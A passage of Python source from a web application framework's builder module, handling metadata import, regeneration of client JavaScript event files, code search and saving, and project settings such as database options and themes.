o, n = compare[old.id.value]
if o and not n:
old.delete()
else:
old.next()
else:
old.next()
if 'update' in options:
for it in old:
if not owner_id or owner_id == it.owner_rec_id.value:
o, n = compare[old.id.value]
if o and n and new.locate('id', old.id.value):
old.edit()
copy_record(old, new)
if detail_name:
update_item(detail_name, owner=old)
old.post()
if 'insert' in options:
for it in new:
if not owner_id or owner_id == it.owner_rec_id.value:
o, n = compare[new.id.value]
if not o and n:
old.append()
copy_record(old, new)
if detail_name:
update_item(detail_name, owner=old)
old.post()
return old
def get_delta(item_name, detail_name=None, options=['update', 'insert', 'delete']):
item = update_item(item_name, detail_name, options)
return item.delta()
def get_new_fields(item_id):
result = []
new_items = new_dict['sys_items']
if new_items.locate('id', item_id):
parent_id = new_items.parent.value
new_fields = new_dict['sys_fields']
for field in new_fields:
if field.owner_rec_id.value in [item_id, parent_id]:
if not (field.f_calculated.value or field.f_master_field.value):
dic = {}
dic['id'] = field.id.value
dic['field_name'] = field.f_db_field_name.value
dic['data_type'] = field.f_data_type.value
dic['size'] = field.f_size.value
dic['default_value'] = ''#field.f_default_value.value
dic['primary_key'] = field.id.value == new_items.f_primary_key.value
result.append(dic)
return result
def get_table_name(item_id):
new_items = new_dict['sys_items']
if new_items.locate('id', item_id):
if not new_items.f_virtual_table.value:
return new_items.f_table_name.value
def copy_tmp_files(zip_file_name):
dir = os.path.join(os.getcwd(), 'tmp-' + datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"))
if os.path.exists(dir):
shutil.rmtree(dir)
os.makedirs(dir)
with zipfile.ZipFile(zip_file_name) as z:
z.extractall(dir)
return dir
def delete_tmp_files(dir):
if os.path.exists(dir):
shutil.rmtree(dir)
def copy_files(dir):
from distutils import dir_util
dir_util.copy_tree(dir, os.getcwd())
def get_foreign_key_dict(ind):
dic = None
if ind.f_foreign_index.value:
dic = {}
fields = new_dict['sys_fields']
fields.locate('id', ind.f_foreign_field.value)
dic['key'] = fields.f_db_field_name.value
ref_id = fields.f_object.value
items = new_dict['sys_items']
items.locate('id', ref_id)
dic['ref'] = items.f_table_name.value
primary_key = items.f_primary_key.value
fields.locate('id', primary_key)
dic['primary_key'] = fields.f_db_field_name.value
return dic
def check_generator(item, delta):
db_type = get_db_type(item.task)
db_module = db_modules.get_db_module(db_type)
for d in delta:
if d.rec_inserted() and db_module.NEED_GENERATOR and \
d.f_primary_key.value and not d.f_gen_name.value:
d.edit()
d.f_gen_name.value = '%s_SEQ' % d.f_table_name.value
d.post()
def update_indexes(new_dict, new_db_type, old_db_type):
if new_db_type == db_modules.FIREBIRD or old_db_type == db_modules.FIREBIRD:
item = new_dict['sys_indices']
for it in item:
if it.f_fields_list.value:
field_list = common.load_index_fields(it.f_fields_list.value)
desc = it.descending.value
if field_list:
it.edit()
if new_db_type == db_modules.FIREBIRD:
l = []
for f in field_list:
l.append([f[0], desc])
field_list = l
elif old_db_type == db_modules.FIREBIRD:
desc = field_list[0][1]
it.descending.value = desc
it.f_fields_list.value = common.store_index_fields(field_list)
it.post()
def update_item_idents(new_dict, item_name, field_names, old_case, new_case):
item = new_dict[item_name]
fields = []
for field_name in field_names:
fields.append(item.field_by_name(field_name))
item.log_changes = False
for it in item:
it.edit()
for field in fields:
if new_case(field.value) == field.value and not field.value.upper() in common.SQL_KEYWORDS:
field.value = old_case(field.value)
it.post()
def update_idents(new_dict, new_db_type, old_db_type):
new_case = db_modules.get_db_module(new_db_type).identifier_case
old_case = db_modules.get_db_module(old_db_type).identifier_case
if old_case('a') != new_case('a'):
update_item_idents(new_dict, 'sys_items', ['f_table_name', 'f_gen_name'], old_case, new_case)
update_item_idents(new_dict, 'sys_fields', ['f_db_field_name'], old_case, new_case)
update_item_idents(new_dict, 'sys_indices', ['f_index_name'], old_case, new_case)
update_indexes(new_dict, new_db_type, old_db_type)
def get_fk_ind():
fk = {}
if db_type == db_modules.SQLITE:
indexes = new_dict['sys_indices']
for ind in indexes:
if ind.f_foreign_index.value:
dic = get_foreign_key_dict(ind)
if not fk.get(ind.owner_rec_id.value):
fk[ind.owner_rec_id.value] = []
fk[ind.owner_rec_id.value].append(dic)
return fk
def analize(dir, db_type):
try:
fk_ind = get_fk_ind() # SQLITE only
error = ''
db_sql = []
adm_sql = []
deltas = {}
delta = get_delta('sys_indices', options=['delete'])
for d in delta:
table_name = get_table_name(d.owner_rec_id.value)
if table_name:
db_sql.append(indices_delete_sql(task.sys_indices, d))
adm_sql.append(delta.apply_sql())
delta = get_delta('sys_items', 'sys_fields')
check_generator(task.sys_items, delta)
for d in delta:
if d.rec_inserted():
db_sql.append(items_insert_sql(task.sys_items, d,
new_fields=get_new_fields(d.id.value),
foreign_fields=fk_ind.get(d.id.value)))
elif d.rec_modified():
db_sql.append(items_update_sql(task.sys_items, d))
elif d.rec_deleted():
db_sql.append(items_delete_sql(task.sys_items, d))
refresh_old_item(old_dict['sys_items'])
delta = get_delta('sys_items')
check_generator(task.sys_items, delta)
adm_sql.append(delta.apply_sql())
refresh_old_item(old_dict['sys_fields'])
delta = get_delta('sys_fields')
adm_sql.append(delta.apply_sql())
refresh_old_item(old_dict['sys_indices'])
delta = get_delta('sys_indices', options=['update', 'insert'])
for d in delta:
table_name = get_table_name(d.owner_rec_id.value)
if table_name:
if d.rec_inserted():
db_sql.append(indices_insert_sql(task.sys_indices, d, table_name,
get_new_fields(d.owner_rec_id.value),
foreign_key_dict=get_foreign_key_dict(d)))
elif d.rec_deleted():
db_sql.append(indices_delete_sql(task.sys_indices, d))
adm_sql.append(delta.apply_sql())
delta = get_delta('sys_filters')
adm_sql.append(delta.apply_sql())
delta = get_delta('sys_report_params')
adm_sql.append(delta.apply_sql())
delta = get_delta('sys_roles')
adm_sql.append(delta.apply_sql())
delta = get_delta('sys_params')
adm_sql.append(delta.apply_sql())
delta = get_delta('sys_privileges')
adm_sql.append(delta.apply_sql())
delta = get_delta('sys_lookup_lists')
adm_sql.append(delta.apply_sql())
except Exception as e:
error = traceback.format_exc()
print('Import error: %s' % error)
return error, db_sql, adm_sql
def reload_utils():
    # Re-import every already-loaded python module found under the
    # project's utils folder so imported code changes take effect without
    # a server restart. Uses the enclosing scope's `task`.
    utils_folder = os.path.join(task.work_dir, 'utils')
    if os.path.exists(utils_folder):
        for dirpath, dirnames, filenames in os.walk(utils_folder):
            for file_name in filenames:
                name, ext = os.path.splitext(file_name)
                if ext == '.py':
                    # dotted module name relative to the work dir
                    relpath = os.path.join(os.path.relpath(dirpath, task.work_dir), name)
                    module_name = '.'.join(relpath.split(os.sep))
                    module = sys.modules.get(module_name)
                    if module:
                        try:
                            reload(module)
                        except Exception as e:
                            # a broken module must not abort the import
                            print('%s %s' % (module_name, e))
def project_empty():
    # True when no item of the current project has a database table yet,
    # i.e. the project database holds no user data to lose.
    probe = task.sys_items.copy(handlers=False)
    probe.set_where(task_id=task_id)
    probe.open(fields=['id', 'f_table_name'])
    for rec in probe:
        if rec.f_table_name.value:
            return False
    return True
# Main body of the metadata import procedure (its def starts above this
# chunk). Builds an html progress report in task.__import_message and
# returns (success, error, message).
error = ''
task.__import_message = ''
def info_from_error(err):
    # Wrap an error text in an html error block for the report.
    # NOTE(review): splits on a literal backslash-n ('\\n'), not on real
    # newlines - confirm the incoming text really contains escaped newlines.
    arr = str(err).split('\\n')
    error = '<br>'.join(arr)
    return '<div class="text-error">%s</div>' % error
def show_progress(string):
    # Log a progress header both to stdout and to the html report.
    print(string)
    task.__import_message += '<h5>' + string + '</h5>'
def show_info(info):
    # Append an indented detail line to the html report.
    task.__import_message += '<div style="margin-left: 30px;">' + info + '</div>'
db_type = get_db_type(task)
if db_type == db_modules.SQLITE and not project_empty():
    # SQLite cannot apply the required schema changes on a non-empty project
    error = 'Metadata can not be imported into an existing SQLITE project'
    show_progress(error)
    return False, error, task.__import_message
task.app.under_maintenance = True
success = False
try:
    request_count = 0
    if from_client:
        # the importing request itself counts as one busy request
        request_count = 1
    file_name = os.path.join(to_unicode(os.getcwd(), 'utf-8'), os.path.normpath(file_name))
    show_progress(task.language('import_reading_data'))
    dir = copy_tmp_files(file_name)
    new_dict, old_dict, new_db_type = get_items(dir)
    if new_db_type != db_type:
        # metadata came from another db type - convert identifiers
        update_idents(new_dict, new_db_type, db_type)
    show_progress(task.language('import_checking_integrity'))
    error = check_items()
    info = ''
    if error:
        show_info(error)
    else:
        show_progress(task.language('import_analyzing'))
        error, db_sql, adm_sql = analize(dir, db_type)
        if error:
            show_info(error)
    if not error:
        success = True
        show_progress(task.language('import_waiting_close'))
        # Wait until all other requests have finished.
        # NOTE(review): i is re-initialized on every pass, so the
        # "i > 3000" timeout can never fire - the loop exits only when
        # task.app._busy drops; confirm this is intended.
        while True:
            i = 0
            if task.app._busy > request_count:
                time.sleep(0.1)
                i += 1
                if i > 3000:
                    break
            else:
                break
        if len(db_sql):
            show_progress(task.language('import_changing_db'))
            success, error, info = execute_ddl(task, db_sql)
            show_info(info)
        if success:
            show_progress(task.language('import_changing_admin'))
            result, error = task.execute(adm_sql)
            if error:
                success = False
        if success:
            show_progress(task.language('import_copying'))
            copy_files(dir)
    if success:
        # reload settings, utils modules and rebuild the task tree
        read_setting(task)
        reload_utils()
        read_setting(task)
        load_task(task.app.task, task.app, first_build=False, after_import=True)
        task.app.privileges = None
        task.app.task.mod_count += 1
        update_events_code(task)
except Exception as e:
    try:
        success = False
        error = str(e)
        if os.name != 'nt':
            trb = info_from_error(error)
            error = trb
        print(error)
        show_info(error)
    except:
        pass
finally:
    # best-effort cleanup; maintenance flag must always be reset
    try:
        show_progress(task.language('import_deleteing_files'))
        delete_tmp_files(dir)
    except:
        pass
    try:
        os.remove(file_name)
    except:
        pass
    task.app.under_maintenance = False
return success, error, task.__import_message
def get_module_names_dict(task, task_id):
    """Map every sys_items id of the task tree to its dotted module path.

    The path is built from f_item_name values up to (but excluding) the
    task node itself; resolved paths are memoized in the tree entries.
    """
    def resolve(tree, node_id):
        # Lazily compute and cache the dotted path of one node.
        entry = tree[node_id]
        parent_id = entry[0] if node_id != task_id else 0
        if parent_id:
            parent_entry = tree[parent_id]
            if not parent_entry[2]:
                parent_entry[2] = resolve(tree, parent_id)
            entry[2] = parent_entry[2] + '.' + entry[1]
        else:
            entry[2] = entry[1]
        return entry[2]
    items = task.sys_items.copy(handlers=False)
    items.set_where(task_id=task_id)
    items.set_order_by('id')
    items.open()
    tree = {}
    for item in items:
        tree[item.id.value] = [item.parent.value, item.f_item_name.value, '']
    return {item.id.value: resolve(tree, item.id.value) for item in items}
def server_find_in_task(task, task_id, search_text, case_sencitive, whole_words):
    # Search *search_text* in all client and server modules of the task
    # tree. Returns {'client': ..., 'server': ...} where each value is a
    # text of "module.path:line: source" entries sorted by module and line.
    # (parameter name "case_sencitive" is a kept misspelling - callers use it)
    try:
        search_text = search_text.decode("utf-8")
    except:
        pass  # already a str (py3) - search as-is
    if not case_sencitive:
        search_text = search_text.upper()
    def is_whole_word(line, pos, search_text):
        # True when the match at *pos* is not part of a larger identifier.
        if pos > 0:
            ch = line[pos - 1]
            if ch.isalpha() or ch == '_':
                return False
        if pos + len(search_text) < len(line):
            ch = line[pos + len(search_text)]
            if ch.isalpha() or ch == '_':
                return False
        return True
    def find_in_text(text, search_text, module_name):
        # Collect (module, line_no, stripped_line) tuples for matches.
        # NOTE(review): only the first occurrence per line is tested for
        # the whole-word condition - confirm intended.
        result = []
        if text:
            lines = text.splitlines()
            for i, l in enumerate(lines):
                line = l
                if not case_sencitive:
                    line = l.upper()
                pos = line.find(search_text)
                if pos > -1:
                    if whole_words and not is_whole_word(line, pos, search_text):
                        continue
                    result.append((module_name, i + 1, l.strip()))
        return result
    def find_in_type(header, module_type):
        # Search one module kind across all items and format the hit list.
        search = ''
        result = []
        for it in items:
            if module_type == common.CLIENT_MODULE:
                text = it.f_client_module.value
            elif module_type == common.WEB_CLIENT_MODULE:
                text = it.f_web_client_module.value
            elif module_type == common.SERVER_MODULE:
                text = it.f_server_module.value
            result += find_in_text(text, search_text, names_dict[it.id.value])
        result = sorted(result, key=itemgetter(0, 1, 2))
        for line in result:
            search += '%s:%s: %s\n' % line
        if header:
            search = header + '\n' + search
        return search + '\n'
    names_dict = get_module_names_dict(task, task_id)
    items = task.sys_items.copy(handlers=False)
    items.set_where(task_id=task_id)
    items.open(fields=['id', 'f_item_name', 'f_web_client_module', 'f_server_module'])
    result = {'client': find_in_type('', common.WEB_CLIENT_MODULE),
        'server': find_in_type('', common.SERVER_MODULE)}
    return result
def server_web_print_code(task, task_id):
    # Collect all client and server module sources of the task tree for
    # printing: {'task': name, 'client': [[module, code], ...],
    # 'server': [[module, code], ...]}.
    def add_detail_code(item, module_type):
        # Append the code of every detail whose master is *item*.
        for child in children:
            if child.table_id.value == item.id.value:
                add_code(child, module_type)
    def add_code(item, module_type):
        if module_type == common.WEB_CLIENT_MODULE:
            name = 'client'
            code = item.f_web_client_module.value
        else:
            name = 'server'
            code = item.f_server_module.value
        if code and len(code):
            result[name].append([names_dict[item.id.value], code])
        add_detail_code(item, module_type)
    result = {}
    names_dict = get_module_names_dict(task, task_id)
    children = task.sys_items.copy()
    children.set_where(table_id__gt=0)
    children.open()
    items = task.sys_items.copy()
    items.set_where(task_id=task_id)
    items.open()
    items.locate('id', task_id)
    result['task'] = items.f_name.value
    result['client'] = []
    result['server'] = []
    for it in items:
        if not it.table_id.value:
            # `items` is the iteration cursor itself, positioned at `it`,
            # so passing `items` here passes the current record
            add_code(items, common.WEB_CLIENT_MODULE)
            add_code(items, common.SERVER_MODULE)
    return result
def update_events_code(task):
    # Regenerate the per-item events javascript files from the stored
    # client modules, update F_JS_FILENAME in sys_items and optionally
    # minify the output. Honors the SINGLE_FILE_JS and COMPRESSED_JS
    # settings.
    def process_events(code, js_funcs, ID, path):
        # Wrap one item's client code in an EventsNNN constructor and
        # register it on task.events.
        script = ''
        if code:
            script += '\nfunction Events%s() { // %s \n\n' % (ID, path)
            # indent the body one tab; normalize 4-space indents to tabs
            code = '\t' + code.replace('\n', '\n\t')
            code = code.replace('    ', '\t')
            script += code
            if js_funcs:
                # bindings generated by parse_js for top-level functions
                script += js_funcs
            else:
                script += '\n'
            script += '}\n\n'
            script += 'task.events.events%s = new Events%s();\n' % (ID, ID)
        return script
    def get_js_path(it):
        # Dotted path of the item inside the task tree (task name excluded).
        def get_parent_name(id_value, l):
            tp = name_dict.get(id_value)
            if tp:
                parent, type_id, name, external = tp
                l.insert(0, name)
                get_parent_name(parent, l)
        l = []
        l.append(it.f_item_name.value)
        get_parent_name(it.parent.value, l)
        return '.'.join(l)
    def get_external(it):
        # Details inherit the "external js file" flag from their master.
        external = it.f_js_external.value
        if it.type_id.value == common.DETAIL_TYPE:
            parent, type_id, name, parent_external = name_dict.get(it.parent.value)
            external = parent_external
        return external
    def update_task(item):
        # Push the generated file name into the live task tree.
        js_filename = js_filenames.get(item.ID, '')
        item.js_filename = js_filename
    def get_js_file_name(js_path):
        return js_path + '.js'
    single_file = common.SETTINGS['SINGLE_FILE_JS']
    name_dict = {}
    js_filenames = {}
    it = task.sys_items.copy(handlers=False, details=False)
    it.set_where(type_id=common.TASK_TYPE)
    it.set_order_by('type_id')
    it.open()
    task_id = it.task_id.value
    it.set_where(task_id=task_id)
    it.open(fields=['id', 'parent', 'type_id', 'f_name', 'f_item_name', 'f_js_filename', 'f_js_external', 'f_web_client_module', 'f_js_funcs'])
    script_start = '(function($, task) {\n"use strict";\n'
    script_end = '\n})(jQuery, task)'
    script_common = ''
    for it in it:
        js_path = get_js_path(it)
        js_filename = get_js_file_name(js_path)
        file_name = os.path.join(to_unicode(os.getcwd(), 'utf-8'), 'js', js_filename)
        # remove stale generated files (and their minified copies) first
        if os.path.exists(file_name):
            os.remove(file_name)
        min_file_name = get_minified_name(file_name)
        if os.path.exists(min_file_name):
            os.remove(min_file_name)
        name_dict[it.id.value] = [it.parent.value, it.type_id.value, it.f_item_name.value, it.f_js_external.value]
        code = it.f_web_client_module.value
        js_funcs = it.f_js_funcs.value
        cur_js_filename = ''
        if code:
            code = code.strip()
            if code:
                script = process_events(code, js_funcs, it.id.value, js_path)
                external = get_external(it)
                if single_file and not external:
                    # collected into one bundle written after the loop
                    script_common += script
                else:
                    script = script_start + script + script_end
                    cur_js_filename = js_filename
                    file_write(file_name, script)
                    if common.SETTINGS['COMPRESSED_JS']:
                        minify(file_name)
        js_filenames[it.id.value] = cur_js_filename
    if single_file:
        # the bundle is stored under the task item's name
        it.first()
        js_file_name = get_js_file_name(it.f_item_name.value)
        js_filenames[it.id.value] = js_file_name
        script = script_start + script_common + script_end
        file_name = os.path.join(to_unicode(os.getcwd(), 'utf-8'), 'js', js_file_name)
        file_write(file_name, script)
        if common.SETTINGS['COMPRESSED_JS']:
            minify(file_name)
    sql = []
    for key, value in iteritems(js_filenames):
        sql.append("UPDATE %s SET F_JS_FILENAME = '%s' WHERE ID = %s" % (it.table_name, value, key))
    it.task.execute(sql)
    if it.task.app.task:
        it.task.app.task.all(update_task)
    try:
        # optional project hook run after regeneration
        from utils.js_code import update_js
        update_js(task)
    except:
        pass
def get_minified_name(file_name):
    """Return the '.min' variant of *file_name* for .js/.css files.

    Any other extension is returned unchanged.
    """
    directory, base = os.path.split(file_name)
    stem, extension = os.path.splitext(base)
    if extension not in ('.js', '.css'):
        return file_name
    return os.path.join(directory, '%s.min%s' % (stem, extension))
def minify(file_name):
    # Write a minified copy of *file_name* next to it (with a '.min'
    # suffix, see get_minified_name). Uses the bundled jsmin.
    min_file_name = get_minified_name(file_name)
    from jam.third_party.jsmin import jsmin
    text = file_read(file_name)
    file_write(min_file_name, jsmin(text))
def get_field_dict(task, item_id, parent_id, type_id, table_id):
    # Return a {field_name: None} dict of the item's fields - used by the
    # builder editors for code completion. Only data items/tables/details
    # have fields; the 'deleted' flag field is excluded.
    result = {}
    if type_id in [common.ITEM_TYPE, common.TABLE_TYPE, common.DETAIL_TYPE]:
        fields = task.sys_fields.copy()
        if table_id:
            # a detail shows the fields of its underlying table (and that
            # table's parent group)
            fields.filters.owner_rec_id.value = [table_id, task.sys_items.field_by_id(table_id, 'parent')]
        else:
            fields.filters.owner_rec_id.value = [item_id, parent_id]
        fields.open()
        for f in fields:
            if f.f_field_name.value.lower() != 'deleted':
                result[f.f_field_name.value] = None
    return result
def server_get_task_dict(task):
    # Build a nested {item_name: {field_name: None}} dict of the whole
    # task tree plus a flat {item_id: fields_dict} map - both used for
    # code completion. Returns (tree_dict, item_fields).
    def get_children(items, id_value, type_id, dict, key, parent_id, item_fields):
        childs = {}
        if type_id in (common.TASK_TYPE, common.ITEMS_TYPE,
            common.TABLES_TYPE, common.REPORTS_TYPE):
            # group node - recurse into the children on a cloned cursor so
            # the caller's iteration position is preserved
            for it in items:
                if it.parent.value == id_value:
                    clone = items.clone()
                    get_children(clone, it.id.value, it.type_id.value, childs, it.f_item_name.value, it.parent.value, item_fields)
        else:
            # leaf item - collect its own and its parent group's names
            fields = []
            f = f_dict.get(id_value)
            if f:
                fields += f
            f = f_dict.get(parent_id)
            if f:
                fields += f
            for f in fields:
                childs[f] = None
        item_fields[id_value] = childs
        dict[key] = childs
    it = task.sys_items.copy(handlers=False)
    it.set_where(type_id=common.TASK_TYPE)
    it.open()
    task_id = it.id.value
    result = {}
    f_dict = {}
    items = task.sys_items.copy(handlers=False)
    items.details_active = False
    items.open(fields=['id', 'type_id', 'parent', 'f_item_name'])
    # field names per owner record ('deleted' excluded)
    fields = task.sys_fields.copy(handlers=False)
    fields.open(fields=['owner_rec_id', 'f_field_name'])
    for f in fields:
        if f.f_field_name.value.lower() != 'deleted':
            d = f_dict.get(f.owner_rec_id.value, [])
            if not d:
                f_dict[f.owner_rec_id.value] = d
            d.append(f.f_field_name.value)
    # report params contribute names the same way as fields
    params = task.sys_report_params.copy(handlers=False)
    params.open(fields=['owner_rec_id', 'f_param_name'])
    for f in params:
        d = f_dict.get(f.owner_rec_id.value, [])
        if not d:
            f_dict[f.owner_rec_id.value] = d
        d.append(f.f_param_name.value)
    item_fields = {}
    get_children(items, task_id, common.TASK_TYPE, result, 'task', None, item_fields)
    return result['task'], item_fields
def server_item_info(task, item_id, is_server):
    # Build the editor payload for an item's server (python) or client
    # (javascript) module: code, completion dicts, event list and display
    # metadata. Returns the dict consumed by the builder editor.
    result = {}
    items = task.sys_items.copy()
    items.set_where(id=item_id)
    items.open()
    type_id = items.type_id.value
    parent_id = items.parent.value
    task_id = items.task_id.value
    table_id = items.table_id.value
    item_name = items.f_item_name.value
    if table_id:
        # details are displayed as "master.detail"
        parent = task.sys_items.copy()
        parent.set_where(id=parent_id)
        parent.open()
        item_name = parent.f_item_name.value + '.' + item_name
    tag = item_name.replace('.', '-')
    if is_server:
        code = items.f_server_module.value
        ext = 'py'
        doc_type = 'server'
        tag = tag + '-server'
    else:
        code = items.f_web_client_module.value
        ext = 'js'
        doc_type = 'client'
        tag = tag + '-client'
    if not code:
        code = ''
    result['fields'] = get_field_dict(task, item_id, parent_id, type_id, table_id)
    result['task'] = {} #server_get_task_dict(task)
    result['events'] = get_events(type_id, is_server)
    result['module'] = common.get_funcs_info(code, is_server)
    result['name'] = '%s.%s' % (item_name, ext)
    result['ext'] = ext
    result['doc'] = code
    result['doc_type'] = doc_type
    result['rec_id'] = item_id
    result['type'] = doc_type
    result['tag'] = tag
    return result
def parse_js(code):
    # Parse a client module with the bundled esprima parser and build the
    # snippet that publishes every top-level function declaration as an
    # attribute of the generated Events object (see update_events_code).
    # Raises on javascript syntax errors - callers rely on that.
    script = ''
    ast = parseScript(to_unicode(code, 'utf-8'))
    for e in ast.body:
        if isinstance(e, nodes.FunctionDeclaration):
            script += '\tthis.%s = %s;\n' % (e.id.name, e.id.name)
    if script:
        script = '\n' + script
    return script
def server_save_edit(task, item_id, text, is_server):
    """Validate and store an item's server or client module code.

    Server code is syntax-checked with compile(); client code is parsed
    with parse_js() (which also extracts the top-level function bindings).
    On success the code is written to sys_items and the corresponding
    rebuild flag is set. Returns {'error': str, 'line': int|None,
    'module_info': ...} where 'line' is the error line when known.
    """
    code = text
    text = to_bytes(text, 'utf-8')
    line = None
    error = ''
    module_info = None
    module_type = common.WEB_CLIENT_MODULE
    if is_server:
        module_type = common.SERVER_MODULE
    if is_server:
        # syntax-check the python source without executing it
        try:
            compile(text, 'check_item_code', "exec")
        except Exception as e:
            try:
                # SyntaxError.args == (msg, (filename, lineno, offset, text))
                line = e.args[1][1]
                col = e.args[1][2]
                if line and col:
                    error = ' %s - line %d col %d' % (e.args[0], line, col)
                elif line:
                    # Bug fix: the format string had a second 'col %d'
                    # placeholder with no matching argument, so this branch
                    # raised TypeError and masked the real position message.
                    error = ' %s - line %d' % (e.args[0], line)
                else:
                    error = e.args[0]
            except:
                error = str(e).replace('check_item_code, ', '')
                traceback.print_exc()
    else:
        # parse the javascript; js_funcs is stored alongside the code
        try:
            js_funcs = parse_js(text)
        except Exception as e:
            try:
                # esprima message looks like 'Line N:message'
                err_str = e.args[0]
                line, err = err_str.split(':')
                try:
                    line = int(line[5:])
                except:
                    pass
                error = err_str
            except:
                error = error_message(e)
                traceback.print_exc()
    if not error:
        try:
            item = task.sys_items.copy()
            item.set_where(id=item_id)
            item.open(fields=['id', 'f_server_module', 'f_web_client_module', 'f_js_funcs'])
            if item.record_count() == 1:
                item.edit()
                if is_server:
                    item.f_server_module.value = code
                else:
                    item.f_web_client_module.value = code
                    item.f_js_funcs.value = js_funcs
                item.post()
                item.apply()
                module_info = common.get_funcs_info(code, is_server)
            else:
                error = task.language('item_with_id_not found') % item_id
        except Exception as e:
            traceback.print_exc()
            error = error_message(e)
        # flag the task tree for rebuild on the next request
        if is_server:
            task.app.task_server_modified = True
        else:
            task.app.task_client_modified = True
    return {'error': error, 'line': line, 'module_info': module_info}
def server_file_info(task, file_name):
    """Return editor info for one of the project's editable files.

    'project.css' is resolved inside the css folder; everything else is
    treated as html. The 'doc' key is present only when the file exists.
    """
    info = {}
    path = file_name
    extension = 'html'
    if file_name == 'project.css':
        extension = 'css'
        path = os.path.join('css', 'project.css')
    if os.path.exists(path):
        info['doc'] = file_read(path)
    info['name'] = file_name
    info['ext'] = extension
    info['type'] = ''
    info['tag'] = file_name.replace('.', '-')
    return info
def server_save_file(task, file_name, code):
    """Write *code* back to a project file edited in the builder.

    'project.css' is resolved into the css folder. Saving index.html
    re-applies the current theme. Returns {'error': ''} on success.
    """
    error = ''
    if file_name == 'project.css':
        file_name = os.path.join('css', 'project.css')
    file_name = os.path.normpath(file_name)
    try:
        file_write(file_name, code)
    except Exception as e:
        traceback.print_exc()
        error = error_message(e)
    result = {'error': error}
    if file_name == 'index.html':
        # index.html carries the theme css links - restore them
        change_theme(task)
    return result
def server_get_db_options(task, db_type):
    """Return (capabilities_dict, error) for the given database type.

    The dict mirrors the db module's connection-dialog flags; on failure
    (unknown type, broken module) returns (None, error_text).
    """
    try:
        db_module = db_modules.get_db_module(db_type)
        options = {
            'DATABASE': db_module.DATABASE,
            'NEED_DATABASE_NAME': db_module.NEED_DATABASE_NAME,
            'NEED_LOGIN': db_module.NEED_LOGIN,
            'NEED_PASSWORD': db_module.NEED_PASSWORD,
            'NEED_ENCODING': db_module.NEED_ENCODING,
            'NEED_HOST': db_module.NEED_HOST,
            'NEED_PORT': db_module.NEED_PORT,
            'CAN_CHANGE_TYPE': db_module.CAN_CHANGE_TYPE,
            'CAN_CHANGE_SIZE': db_module.CAN_CHANGE_SIZE,
            'NEED_GENERATOR': db_module.NEED_GENERATOR,
        }
        if hasattr(db_module, 'get_table_info'):
            # modules that can introspect tables support importing them
            options['IMPORT_SUPPORT'] = True
        return options, ''
    except Exception as e:
        return None, str(e)
def server_get_task_info(task):
    """Return (name, caption, version, db alias, start time) of the project."""
    items = task.sys_items.copy()
    items.set_where(type_id=common.TASK_TYPE)
    items.open(fields=['f_item_name', 'f_name'])
    name = items.f_item_name.value
    caption = items.f_name.value
    params = task.sys_params.copy()
    params.open()
    # project version is reported together with the framework version
    version = '%s / %s' % (params.f_version.value, task.app.jam_version)
    tasks = task.sys_tasks.copy()
    tasks.open()
    database = tasks.f_alias.value
    return name, caption, version, database, task.app.started
def server_can_delete_lookup_list(task, list_id):
    # Return an html message naming every field that uses the lookup list,
    # or None (implicit) when the list is unused and may be deleted.
    fields = task.sys_fields.copy()
    fields.set_where(f_lookup_values=list_id)
    fields.open()
    used = []
    for f in fields:
        used.append({'field1': task.sys_items.field_by_id(f.owner_rec_id.value, 'f_item_name'), 'field2': f.f_field_name.value})
    if len(used) != 0:
        names = ',<br>'.join([task.language('field_mess') % use for use in used])
        mess = task.language('lookup_list_is_used_in') % names
        return mess
def server_valid_item_name(task, item_id, parent_id, name, type_id):
    # Validate a new/changed item name. Returns '' when valid, otherwise
    # an error text. Rules: 'system'/'history' are reserved (unless the
    # item already has that name); detail names must be unique among
    # siblings; all other item names must be unique project-wide.
    result = ''
    items = task.sys_items.copy(handlers=False, details=False)
    if name.upper() in ['SYSTEM', 'HISTORY']:
        items.set_where(id=item_id)
        items.open()
        if items.f_item_name.value.upper() != name.upper():
            result = task.language('reserved_word')
    elif type_id == common.DETAIL_TYPE:
        # details only clash with other details of the same master
        items.set_where(parent=parent_id)
        items.open()
        for it in items:
            if it.task_id.value and it.id.value != item_id and it.f_item_name.value.upper() == name.upper():
                result = 'There is an item with this name'
                break
    else:
        # any non-detail item: names must be unique across the project
        items = task.sys_items.copy(handlers=False, details=False)
        items.set_where(type_id__ne=common.DETAIL_TYPE)
        items.open()
        for it in items:
            if it.task_id.value and it.id.value != item_id and it.f_item_name.value.upper() == name.upper():
                result = 'There is an item with this name'
                break
    return result
def server_create_task(task):
    # Create the project database: first normalize all stored db field
    # names to the target database's identifier case, then build the task.
    db_type, db_server, db_database, db_user, db_password, db_host, db_port, db_encoding = db_info(task)
    db_module = db_modules.get_db_module(db_type)
    fields = task.sys_fields.copy(handlers=False)
    fields.open()
    for f in fields:
        if f.f_db_field_name.value:
            f.edit()
            f.f_db_field_name.value = db_module.identifier_case(f.f_db_field_name.value)
            f.post()
    fields.apply()
    task.create_task()
def get_lookup_list(task, list_id):
    """Return the decoded value list stored in sys_lookup_lists *list_id*."""
    lookup = task.sys_lookup_lists.copy()
    lookup.set_where(id=list_id)
    lookup.open()
    return json.loads(lookup.f_lookup_values_text.value)
def change_theme(task):
    # Rewrite index.html so its css links match the currently selected
    # THEME and SMALL_FONT settings: every other theme file name is
    # replaced by the chosen one, and jam.css/jam12.css are swapped
    # according to the font-size flag.
    rlist = []
    #~ prefix = '/css/'
    prefix = ''
    theme = common.THEME_FILE[common.SETTINGS['THEME']]
    for t in common.THEME_FILE:
        if t and t != theme:
            rlist.append((t, theme))
    if common.SETTINGS['SMALL_FONT']:
        rlist.append(('jam.css', 'jam12.css'))
    else:
        rlist.append(('jam12.css', 'jam.css'))
    file_name = os.path.join(task.work_dir, 'index.html')
    content = file_read(file_name)
    for r1, r2 in rlist:
        content = content.replace(prefix + r1, prefix + r2)
    file_write(file_name, content)
def do_on_apply_param_changes(item, delta, params):
    # Apply project-settings changes and propagate their side effects
    # (client/server rebuild flags, language, safe mode, theme).
    # Returns the execute() result for the settings delta.
    task = item.task
    # snapshot the settings whose change requires post-processing
    language = common.SETTINGS['LANGUAGE']
    debugging = common.SETTINGS['DEBUGGING']  # NOTE(review): snapshot unused below
    safe_mode = common.SETTINGS['SAFE_MODE']
    single_file_js = common.SETTINGS['SINGLE_FILE_JS']
    compressed_js = common.SETTINGS['COMPRESSED_JS']
    theme = common.SETTINGS['THEME']
    small_font = common.SETTINGS['SMALL_FONT']
    sql = delta.apply_sql()
    result = item.task.execute(sql)
    read_setting(task)  # reload SETTINGS from the db to compare
